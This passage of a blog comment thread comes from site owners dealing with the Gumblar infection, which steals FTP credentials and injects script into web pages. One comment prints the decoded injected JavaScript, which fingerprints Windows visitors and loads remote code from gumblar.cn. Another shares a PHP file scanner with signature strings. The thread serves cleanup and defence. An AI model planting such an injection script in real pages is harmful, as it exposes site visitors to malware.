      Did you change your passwords after restoring your site to the old backup? If this code is being uploaded to your site via FTP (which seems to be the case most often), then they clearly have your password. Change your passwords immediately, only use SFTP to connect to your sites and ensure all computers that access your sites (including your web developers!) are free of the virus and using SFTP. If your computer, or your web developers computer still has the virus, your site will continue to be exploited.

  35. |

    My websites were infected by this virus (mainly static html).
    At the beginning I tried to replace all files from the backup on my computer, but each time after doing it (and changing the password) the sites were infected again.

    I tried again, this time using the following steps:
    1) I cleaned my computer using Malwarebytes (it found 93 threats).
    2) I cleaned my computer with Norton antivirus.

    3) I deleted the server definition for each domain, and set them up as new.

    4) I moved the files from my computer (they were not infected) and changed file permissions to 755.

    5) I changed the admin and FTP passwords.

    6) Uninstalled Adobe Reader and FileZilla from my computer.

    The sites stayed clean for as long as I didn't upload any files to the server.
    Yesterday I uploaded new files to the server, and before doing it I ran Malwarebytes and the antivirus again.
    Malwarebytes found the same threats again (how did they enter my computer again?).
    I removed the threats and uploaded the files.
    The next day 2 of my websites were infected once again.
    The good news was that only 2 websites were infected (I have another 5 on the same server),
    so I thought maybe I forgot to change file permissions in those domains.

    But the point I don't understand is how this virus still has access to my server files
    after I cleaned my computer and set up a brand new, updated Norton Internet Security?
    What should I do?

  36. |

    Just to check with you guys; only files get infected right? They don’t mess with databases?
    A joomla! site got hit last weekend and we are looking at restore possibilities…

  37. |

    Reading other people’s comments, I was able to figure out how I got infected and what happened:

    * About 2 days ago, I indeed got the above mentioned PDF warnings when visiting one or more sites (sadly enough I do not remember which ones).
    * After that (with what I now know), I noticed my FTP application, CuteFTP, wasn’t able to connect to any FTP server. I received this error: Can’t read from control socket. Socket error = #10054, which led me to the GlobalScape knowledge base and to a Windows registry key that should be deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux (or aux2).
    That allowed me to use CuteFTP again. But in the meanwhile I had already used Windows Explorer to update a file on a server through FTP.
    * That very one site I changed, got infected with the above mentioned results.

    So I assume the trojan blocks FTP traffic for some (all?) FTP applications and only lets those pass from which it can fetch credentials?

    A malware scanner indeed also pointed that Windows Updates were disabled. I assume the trojan is also responsible for this.

    A colleague alerted me of the infected site because his virus scanner Sophos detected it. Mine, AVG, did not. Google on the other hand indeed also marked the site infected (I noticed in Chrome).

  38. |

    [...] our services for a while now. Recently I read an article on this subject on the "Unmask Parasites" blog. At the time of the article, the site "klaomta.com" was not responding; moreover, still [...]

  39. |

    Got hit with this one today and I decoded the script that is inserted into all the web pages.

    It looks like it is reporting the version of the scripting engine running on your machine to gumblar.cn/rss and doing who knows what with it. It also looks like it is set to run on Windows versions lower than NT 6 (Vista) and not run on sites that set a cookie named "miek=1".

    Here’s what I got when I decoded the script.

    var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
    if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
    zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
    }

  40. |

    The script didn’t paste correctly, so you should probably delete it from my post. I can take a screen shot and send it to you if you like.

  41. |

    This malware problem has been a pain in my neck, but I think I finally have it under control.

    Here is the code I used to search my web server for infected files. Very useful, especially if you have a lot of files. Customize the $exclude_files array and the $search array depending on your needs.

    <?php
    // The comment system cropped the top of this script (everything before the
    // filesize check) and mangled its quotes; the header below is reconstructed
    // from the surviving body. The search strings are only examples (Denis's
    // reply above mentions "base64_decode" and "(function(){" as strings that
    // also hit legitimate files).
    $exclude_files = array();                         // full paths to skip
    $search = array('base64_decode', '(function(){'); // strings to look for

    function scan_files($dir) {
    global $exclude_files, $search;
    $dirs_array = array();

    $handle = opendir($dir);
    if ($handle) {
    while (($file = readdir($handle)) !== false) {
    if ($file == '.' || $file == '..') {
    continue;
    }
    $path = $dir . $file;

    if (is_file($path)) {

    // skip big files
    if (filesize($path) > 1000000) {
    continue;
    }

    // exclude files
    if (in_array($path, $exclude_files)) {
    continue;
    }

    // get content, one line at a time
    $file_handle = fopen($path, 'r');
    $contents = '';
    while (!feof($file_handle)) {
    $contents = fgets($file_handle);

    // loop for search string
    $found = false;
    foreach ($search as $search_string) {
    if (stristr($contents, $search_string)) {
    $found = true;
    break;
    }
    }

    if ($found == true) {
    // (the HTML tags in the original echo lines were stripped by the comment system)
    echo $path . ' ... ';
    echo '[FOUND ' . $search_string . ']';
    echo "\n";

    break; // break while
    } else {
    //echo '[CLEAN]';
    }

    }

    fclose($file_handle);

    } elseif (is_dir($path)) {

    $dirs_array[] = $path;

    }
    }
    closedir($handle);
    }

    foreach ($dirs_array as $dir) {
    scan_files($dir . '/');
    }

    unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

    echo 'Starting from: ' . $start_dir . "\n";

    scan_files($start_dir);

    ?>

  42. |

    The post above cropped the top part of the code for some reason. Add this part to the beginning.

    1000000) {
    continue;
    }

    • |

      Sorry. The blog's comment system removes potentially dangerous code to prevent exploits.

      <?php ?>  You replace "<" with &lt;

    • |

      hey please post your script again – and this time with no errors – thank you

  43. |

    We also got stung with this virus on three wordpress based websites.

    Infected computer appears to be clean now and all FTP details have been changed.

    I would however love to stop saving passwords in Dreamweaver, but that pesky little "save" box has a tendency of ticking itself. Anyone have any ideas on how to remove this function?

  44. |

    Hi,

    I’m a newbie..could you pls explain how I customize the $exclude_files array and the $search array??
    Cheers,
    F3rUk

  45. |

    Since the entry point in your local system is Adobe Reader, I recommend you disable "Acrobat JavaScript" in Edit – Preferences… – JavaScript.

    Apparently Adobe released a security update for Reader yesterday. More information and download links can be found here:

    http://www.adobe.com/support/security/bulletins/apsb09-06.html

    I have no idea if this fixed the exploit however…

  46. |

    I had it on a site with no php.

  47. |

    One of my clients is also infected – so far, you guys have been tremendously helpful. Unfortunately, I’m seeing a rather disturbing problem that no one else has described yet.

    Most of our pages include a PHP header and footer which, among other things, define the block and open the tag for each page. All of the pages that include this header are infected. OK, go to that include file and remove it, right?

    The JavaScript is NOWHERE TO BE FOUND in that include file! If I do a view source on a page that includes it, I see the JavaScript wedged in between the closing tag and the opening tag. If I look in the exact same location in the include file, that code is nowhere to be found, even if I do a text search on it.

    Just to be sure I wasn’t insane, I added an HTML comment in the include file just above where the JS seems to be inserted. Sure enough, the comment AND the JS showed up when I hit view source.

    What concerns me is that this makes it sound like a PHP output buffer is inserting this code. Or, perhaps, some other filter between the PHP engine and the HTTP server. Anyone else seeing stuff like this? Any idea how to get rid of it?

    Thanks!

    Rob Z.

    • |

      The malicious PHP code contains this JavaScript base64 encoded.

      • |

        Yeah, I figured out much later that this code was doing the inserting. But it DID look like it was modifying the output buffer; the injected PHP code was nowhere near where the resulting JS code was in the view source.

        After 10 hours of work and hand-editing more than 130 files, I think we're clean. Also, I took the script posted by rad-one and modified it slightly so that it works on the command line and adds another signature to check against. I posted the link to it on my blog at http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-gumblarcn-trojan/. Feel free to go and download it. There are a lot more modifications that could be done.

        One more point: that script only FINDS the infections. Complex PHP sites may return a lot of false positives, so I'd advise against doing some kind of automated clean at this point.

        • |

          Hi Rob:

          THAT was really helpful – got my hands full now :)

          btw. I found an easy way to check if a site (assuming it has an RSS feed) is still infected.

          Run the feed through FeedBurner and it will reject it if the script is present.

  48. |

    [...] Sometime around 13 May. I am not sure what else this "virus" does other than compromising FTP access and spreading itself via websites… __________________ Life is a compromise of what your ego wants to do, what experience tells [...]

  49. |

    Even my ecommerce site got infected with it.

    here is the code: hope its safe to post malicious code in the comment.

    Edit by Denis: I removed the code because it was the same as in fact #10 of this blog post.

  50. |

    About 9 months ago, a developer site had a plea from someone over a similar type of code injection. Upon dissection I could see that the code was similar to the method illustrated, but importantly its main purpose was to inject into the client's browser the information to fetch data from a number of servers.

    So I then put my machine in the firing line by calling the payload URL and got the resulting, more complex script, which was malware.

    ====================================

    The current attack method being used, which is currently in the press, is nothing more than scaremongering; the issue with this attack is "WEAK" upload pages that do not discriminate against injection and methods of injection.

    In the first instance, people who maintain websites or use 3rd party scripts should check for input cleaning processes to stop these attacks on the server that then allow the botscript to then nest on that server.

    Server Farms can do more to protect their clients and the visitors to an infected site by looking for URL requests coming from their servers and those sites that are making a large number of resource requests that never did before can be targeted and shut down.

    This is something that server farms do not do, they are more concerned with the dollars rolling in rather than the clients that they have and the visitors. It makes more sense to preserve bandwidth for the other clients than let a malware run on their servers.

    Once a malware is running on the server, it will attack or infect if possible the machine that is requesting resources. Then the virus can spread more easily.

    While the media are reporting this as a “JavaScript” attack, it is important to note that javascript has no access to the endusers system other than to “Redirect” or possibly request a resource as in a CSS script or an image or an image via a PHP script that then compromises the users system with a more complex program.

    =========================================

    What to do?

    Firewall, yes, a software firewall, this should run on your computer and you should NEVER just rely on a hardware firewall or the properties of a NAT / Router to perform your defences. They may be good or offer some protection but they are not fool proof. An open port is a port open in both directions.

    Unless you have invested in a real rock-solid professional system, you're best off backing up your router with a software firewall on your computer; there are plenty of free firewalls on offer. No excuses.

    Anti-virus software. This is another important tool that is often overlooked. Get one; there's plenty of free AV tools, like firewalls too.

    Anti-spyware tools, these are aplenty, but be warned, many are spyware themselves. So do yourself a favor and only download and use well-known tools like SpywareBlaster or AdAware or Spybot Search & Destroy, for example.

    If you do suffer an attack or problems then DON’T JUST SIT ON YOUR ASS…. PULL THE MODEM PLUG. Stop your machine from spreading the risk.

    When in doubt, run a Linux distro.

    Finally, I have said this for years: all internet users should undergo a test, like a driving test, to illustrate that they have an understanding of the internet, risks, how a computer works, how to spot unusual activity on the computer and why connections and computers seem slower, as well as how to deal with viruses and other malware. Maybe then, and only then, will idiots stop helping hackers and crackers break into and destroy or steal from systems.

    Peace.